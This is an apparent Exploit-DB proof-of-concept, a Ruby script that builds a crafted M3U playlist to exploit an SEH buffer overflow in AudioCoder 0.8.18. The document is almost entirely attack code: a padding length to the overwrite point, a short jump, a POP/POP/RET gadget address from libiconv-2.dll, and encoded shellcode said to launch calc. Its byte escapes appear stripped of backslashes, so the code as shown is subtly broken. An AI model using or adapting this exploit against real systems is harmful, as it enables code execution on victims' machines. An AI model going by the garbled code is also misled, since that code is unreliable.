
# Title : AudioCoder 0.8.18 - Buffer Overflow Exploit (SEH)
# Published : 2013-05-02
# Author :


#!/usr/bin/env ruby
# Exploit Title: AudioCoder 0.8.18 Buffer Overflow Exploit (SEH)
# Download link: http://www.mediacoderhq.com/getfile.htm?site=dl.mediacoderhq.com&file=AudioCoder-0.8.18.exe
# Vulnerable Product: AudioCoder
# Date (found): 30.04.2013
# Date (publish): 01.05.2013
# RST
# Author: metacom
# Version: version 0.8.18
# Category: poc
# Tested on: windows 7 German  
# Exploit-DB Note:
# This works on Windows 7 Pro Eng

begin
 #calc
 shellcode =
"x89xe0xdbxc8xd9x70xf4x5bx53x59x49x49x49x49" +
"x43x43x43x43x43x43x51x5ax56x54x58x33x30x56" +
"x58x34x41x50x30x41x33x48x48x30x41x30x30x41" +
"x42x41x41x42x54x41x41x51x32x41x42x32x42x42" +
"x30x42x42x58x50x38x41x43x4ax4ax49x4bx4cx4b" +
"x58x4dx59x53x30x55x50x53x30x43x50x4dx59x5a" +
"x45x56x51x58x52x52x44x4cx4bx50x52x56x50x4c" +
"x4bx50x52x54x4cx4cx4bx31x42x45x44x4cx4bx34" +
"x32x31x38x44x4fx4fx47x51x5ax37x56x30x31x4b" +
"x4fx50x31x49x50x4ex4cx57x4cx35x31x33x4cx53" +
"x32x56x4cx37x50x49x51x38x4fx54x4dx35x51x49" +
"x57x4dx32x5ax50x36x32x36x37x4cx4bx46x32x54" +
"x50x4cx4bx47x32x37x4cx53x31x4ex30x4cx4bx47" +
"x30x54x38x4bx35x49x50x42x54x51x5ax35x51x4e" +
"x30x50x50x4cx4bx57x38x55x48x4cx4bx36x38x31" +
"x30x45x51x59x43x4bx53x57x4cx30x49x4cx4bx30" +
"x34x4cx4bx55x51x4ex36x30x31x4bx4fx50x31x49" +
"x50x4ex4cx39x51x48x4fx34x4dx43x31x49x57x46" +
"x58x4bx50x42x55x5ax54x43x33x43x4dx5ax58x37" +
"x4bx33x4dx57x54x53x45x4ax42x30x58x4cx4bx56" +
"x38x36x44x43x31x48x53x35x36x4cx4bx54x4cx30" +
"x4bx4cx4bx56x38x45x4cx53x31x39x43x4cx4bx54" +
"x44x4cx4bx35x51x4ex30x4bx39x51x54x31x34x37" +
"x54x51x4bx51x4bx55x31x30x59x30x5ax46x31x4b" +
"x4fx4dx30x31x48x51x4fx50x5ax4cx4bx42x32x4a" +
"x4bx4bx36x51x4dx52x4ax43x31x4cx4dx4cx45x48" +
"x39x55x50x55x50x53x30x50x50x43x58x36x51x4c" +
"x4bx32x4fx4dx57x4bx4fx39x45x4fx4bx4cx30x48" +
"x35x39x32x56x36x53x58x59x36x5ax35x4fx4dx4d" +
"x4dx4bx4fx38x55x57x4cx35x56x33x4cx44x4ax4b" +
"x30x4bx4bx4dx30x33x45x54x45x4fx4bx50x47x42" +
"x33x33x42x42x4fx42x4ax43x30x31x43x4bx4fx59" +
"x45x32x43x43x51x42x4cx33x53x36x4ex43x55x43" +
"x48x55x35x43x30x41x41"
 
 file = "fuzz.m3u"
 head = "http://"
 junk = "x90" * 765 # Distance to overwrite EIP
 nseh = "xEBx06x90x90" # Short (6 bytes) jump!
 seh  = "xEEx04x01x66" # POP ECX / POP ECX / RETN from libiconv-2.dll
 nops = "x90" * 80
 textfile = open(file , 'w')
 textfile.write(head + junk + nseh + seh + nops + shellcode)
 textfile.close()

 puts
 puts " Vulnerable file created!...n"

end